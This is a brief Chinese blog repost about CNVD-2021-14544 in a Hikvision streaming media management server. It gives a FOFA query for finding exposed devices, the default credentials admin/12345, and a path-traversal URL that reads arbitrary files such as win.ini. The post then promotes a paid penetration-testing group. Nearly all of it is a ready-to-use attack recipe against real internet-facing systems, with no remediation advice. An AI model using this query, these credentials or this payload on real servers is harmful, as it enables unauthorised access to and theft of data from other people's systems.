fofa语法:
title="流媒体管理服务器"
我们随便点一个进去
通用弱口令admin/12345
接着开始文件读取
/systemLog/downFile.php?fileName=../../../../../../../windows/win.ini
bgbing星球:渗透测试,内网渗透,SRC漏洞分享,安全开发,安全武器库
(加入星球送fofa永久会员,送xray高级版)
详细参考:https://mp.weixin.qq.com/s/YDbbo71iFkP0kF-nmSXwHg
本文始发于微信公众号(bgbing安全):(CNVD-2021-14544)海康威视 流媒体管理服务器任意文件读取/通用弱口令
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论